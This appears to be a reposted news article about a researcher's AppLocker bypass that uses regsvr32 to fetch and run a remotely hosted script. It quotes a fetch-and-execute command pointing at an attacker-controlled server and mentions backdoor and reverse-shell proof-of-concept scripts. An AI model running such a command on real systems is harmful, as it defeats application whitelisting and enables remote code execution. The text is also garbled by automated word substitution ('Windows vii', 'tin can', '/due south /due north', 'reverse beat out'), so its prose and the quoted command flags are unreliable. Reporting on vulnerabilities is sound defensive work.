Researcher Bypasses Windows AppLocker's Security

A new exploit has been discovered in Windows AppLocker - used to blacklist or whitelist applications - that could allow hackers to bypass your system's safeguards.

AppLocker exploit bypasses Windows' app security safeguards

Microsoft introduced AppLocker in Windows vii and Windows Server 2008 R2 that allows administrators to specify which users or groups tin run particular applications within an organization. Casey Smith, a security researcher, has discovered an exploit in Windows AppLocker that can be bypassed to execute remote scripts on a automobile. UsingRegsvr32, a command line utility designed for registering DLLs in the registry, an attacker can bypass Windows AppLocker restrictions.

The astonishing matter here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc...And.. You guessed a signed, default MS binary.  Whohoo.

So, all you need to do is host your .sct file at a location you control. From the target, only execute

regsvr32 /due south /due north /u /i:http://server/file.sct scrobj.dll

Its not well documented that regsvr32.exe tin can accept a url for a script.

Smith was looking for a way to annals a script to bypass AppLocker and discovered that y'all could get around Applocker if you instruct Regsvr32 to point to a remotely hosted file, such every bit a script, assuasive your system to run whichever app you want, bypassing system restrictions. This technique doesn't crave administrative privileges, nor does it alter the registry, making it difficult for admins to detect any changes. There is no patch available however, however, Microsoft is expected to roll out a patch very soon. In the meantime, users can blockRegsvr32.exewith Windows Firewall.

Windows AppLocker is considered ane of the nearly important security features of the operating system. When talking about Enhanced Mitigation Experience Toolkit (EMET) for the enterprise, Microsoft said before this year that AppLocker in Windows x provides even improve security than EMET.

Yous can visit the researcher'due south web log to read more details of this exploit and the proof-of-concept scripts that tin can exist loaded usingRegsvr32 to open a backstairs or a reverse beat out over HTTP. Nosotros will update this space equally Microsoft responds to this serious vulnerability.

Source: https://wccftech.com/researcher-bypasses-windows-applockers-security/

Posted by: shooptandinque.blogspot.com

Share this post